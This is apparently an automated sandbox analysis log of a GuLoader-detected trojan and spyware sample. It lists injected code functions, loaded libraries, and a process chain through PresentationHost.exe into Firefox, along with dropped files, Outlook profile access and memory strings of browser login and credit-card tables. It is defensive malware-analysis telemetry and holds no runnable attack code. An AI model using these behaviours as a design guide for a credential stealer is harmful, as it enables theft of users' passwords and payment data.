Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052F2E90	12_2_052F2E90
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539EEDB	12_2_0539EEDB
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052F6962	12_2_052F6962
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E29A0	12_2_052E29A0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052EA840	12_2_052EA840
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052C68B8	12_2_052C68B8
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0530E8F0	12_2_0530E8F0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539AB40	12_2_0539AB40
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539EB89	12_2_0539EB89
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05396BD7	12_2_05396BD7
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052DEA80	12_2_052DEA80
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05397571	12_2_05397571
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0537D5B0	12_2_0537D5B0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539F43F	12_2_0539F43F
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D1460	12_2_052D1460
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539F7B0	12_2_0539F7B0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052D17EC	12_2_052D17EC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05325630	12_2_05325630
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053916CC	12_2_053916CC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053AB16B	12_2_053AB16B
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0531516C	12_2_0531516C
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052CF172	12_2_052CF172
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052EB1B0	12_2_052EB1B0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053970E9	12_2_053970E9
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539F0E0	12_2_0539F0E0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0538F0CC	12_2_0538F0CC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539132D	12_2_0539132D
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052CD34C	12_2_052CD34C
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E52A0	12_2_052E52A0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_053812ED	12_2_053812ED
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FD2F0	12_2_052FD2F0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FB2C0	12_2_052FB2C0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05397D73	12_2_05397D73
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05391D5A	12_2_05391D5A
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FFDC0	12_2_052FFDC0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05359C32	12_2_05359C32
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539FCF2	12_2_0539FCF2
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539FF09	12_2_0539FF09
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539FFB1	12_2_0539FFB1
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E1F92	12_2_052E1F92
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052A3FD2	12_2_052A3FD2
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052A3FD5	12_2_052A3FD5
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E9EB0	12_2_052E9EB0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05375910	12_2_05375910
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E9950	12_2_052E9950
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FB950	12_2_052FB950
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E5990	12_2_052E5990
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0534D800	12_2_0534D800
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052E38E0	12_2_052E38E0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539FB76	12_2_0539FB76
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_052FFB80	12_2_052FFB80
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05355BF0	12_2_05355BF0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0531DBF9	12_2_0531DBF9
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05353A6C	12_2_05353A6C
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0539FA49	12_2_0539FA49
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05397A46	12_2_05397A46
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0537DAAC	12_2_0537DAAC
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_05381AA3	12_2_05381AA3
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_0538DAC6	12_2_0538DAC6
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F72410	12_2_02F72410
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F8C080	12_2_02F8C080
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6D280	12_2_02F6D280
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6D277	12_2_02F6D277
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6D4A0	12_2_02F6D4A0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6B490	12_2_02F6B490
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6B488	12_2_02F6B488
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6B5E0	12_2_02F6B5E0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F6B5D4	12_2_02F6B5D4
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F75AA0	12_2_02F75AA0
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: 12_2_02F73CA0	12_2_02F73CA0

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: String function: 33A2EA12 appears 76 times
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: String function: 339AB970 appears 225 times
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: String function: 33A07E54 appears 103 times
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: String function: 33A3F290 appears 98 times
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: String function: 339F5130 appears 53 times
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: String function: 0534EA12 appears 76 times
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: String function: 0535F290 appears 98 times
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: String function: 05315130 appears 53 times
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: String function: 052CB970 appears 210 times
Source: C:\Windows\SysWOW64\PresentationHost.exe	Code function: String function: 05327E54 appears 96 times

Source: mF8WNclxnv.exe

Static PE information: invalid certificate

Source: mF8WNclxnv.exe, 00000008.00000003.2241843226.0000000033761000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePresentationHost.exej% vs mF8WNclxnv.exe
Source: mF8WNclxnv.exe, 00000008.00000003.2182217941.00000000338FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs mF8WNclxnv.exe
Source: mF8WNclxnv.exe, 00000008.00000002.2314678715.0000000033C51000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs mF8WNclxnv.exe
Source: mF8WNclxnv.exe, 00000008.00000003.2179625223.000000003374B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs mF8WNclxnv.exe
Source: mF8WNclxnv.exe, 00000008.00000003.2241933753.000000003379E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePresentationHost.exej% vs mF8WNclxnv.exe

Source: mF8WNclxnv.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/24@10/8

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

0_2_004033B6

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_0040486A GetDiskFreeSpaceW,MulDiv,

0_2_0040486A

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_004020FB CoCreateInstance,

0_2_004020FB

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

File created: C:\Users\user\AppData\Local\Densitometriens.ini

Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

File created: C:\Users\user\AppData\Local\Temp\nsp9231.tmp

Jump to behavior

Source: mF8WNclxnv.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PresentationHost.exe, 0000000C.00000002.3425025369.00000000033B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL, date_created INTEGER NOT NULL, blacklisted_by_user INTEGER NOT NULL, scheme INTEGER NOT NULL, password_type INTEGER, times_used INTEGER, form_d0J;
Source: PresentationHost.exe, 0000000C.00000002.3428898470.00000000083B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE credit_cards (guid VARCHAR PRIMARY KEY, name_on_card VARCHAR, expiration_month INTEGER, expiration_year Ihg;
Source: PresentationHost.exe, 0000000C.00000002.3425025369.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3425025369.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3425025369.0000000003403000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3425025369.00000000033E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: mF8WNclxnv.exe	Virustotal: Detection: 68%
Source: mF8WNclxnv.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

File read: C:\Users\user\Desktop\mF8WNclxnv.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mF8WNclxnv.exe "C:\Users\user\Desktop\mF8WNclxnv.exe"
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process created: C:\Users\user\Desktop\mF8WNclxnv.exe "C:\Users\user\Desktop\mF8WNclxnv.exe"
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Process created: C:\Users\user\Desktop\mF8WNclxnv.exe "C:\Users\user\Desktop\mF8WNclxnv.exe"	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Process created: C:\Windows\SysWOW64\PresentationHost.exe "C:\Windows\SysWOW64\PresentationHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PresentationHost.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

File written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\dataindustris\attributtildelingerne\Vedisk\Pipestems.ini

Jump to behavior

Source: C:\Windows\SysWOW64\PresentationHost.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: mF8WNclxnv.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: mF8WNclxnv.exe, 00000008.00000001.1885572559.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: PresentationHost.pdbGCTL source: mF8WNclxnv.exe, 00000008.00000003.2241843226.0000000033761000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2241933753.000000003379E000.00000004.00000020.00020000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000003.2212021580.0000000001354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: mF8WNclxnv.exe, 00000008.00000002.2314678715.0000000033B1E000.00000040.00001000.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2182217941.00000000337D0000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000002.2314678715.0000000033980000.00000040.00001000.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2179625223.0000000033628000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, 0000000C.00000002.3426507724.00000000052A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: mF8WNclxnv.exe, mF8WNclxnv.exe, 00000008.00000002.2314678715.0000000033B1E000.00000040.00001000.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2182217941.00000000337D0000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000002.2314678715.0000000033980000.00000040.00001000.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2179625223.0000000033628000.00000004.00000020.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 0000000C.00000002.3426507724.00000000052A0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationHost.pdb source: mF8WNclxnv.exe, 00000008.00000003.2241843226.0000000033761000.00000004.00000020.00020000.00000000.sdmp, mF8WNclxnv.exe, 00000008.00000003.2241933753.000000003379E000.00000004.00000020.00020000.00000000.sdmp, Kf2uv5NZsp.exe, 0000000B.00000003.2212021580.0000000001354000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mshtml.pdbUGP source: mF8WNclxnv.exe, 00000008.00000001.1885572559.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Kf2uv5NZsp.exe, 0000000B.00000000.2196614572.00000000000BF000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.1888435402.000000000681A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\mF8WNclxnv.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 0_2_10002DE0 push eax; ret	0_2_10002E0E
Source: C:\Users\user\Desktop\mF8WNclxnv.exe	Code function: 8_2_339B09AD push ecx; mov dword ptr [esp], ecx	8_2_339B09B6
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D4145E push esp; ret	11_2_04D4145F
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D52565 push ss; ret	11_2_04D5256F
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D59E35 push edi; retf	11_2_04D59E3B
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D387EA push edx; ret	11_2_04D387EB
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D43760 pushfd ; ret	11_2_04D43761
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D430D8 push ss; ret	11_2_04D430E2
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D38885 pushfd ; ret	11_2_04D3888D
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D3D254 pushfd ; iretd	11_2_04D3D259
Source: C:\Program Files (x86)\NstZKonQwHYKhhiOvPvNYHbFrfrAEoZxgSnOJHBqALaXmsrSuGwzsStknKXvhYDB\Kf2uv5NZsp.exe	Code function: 11_2_04D43A6C push edi; ret	11_2_04D43AA5
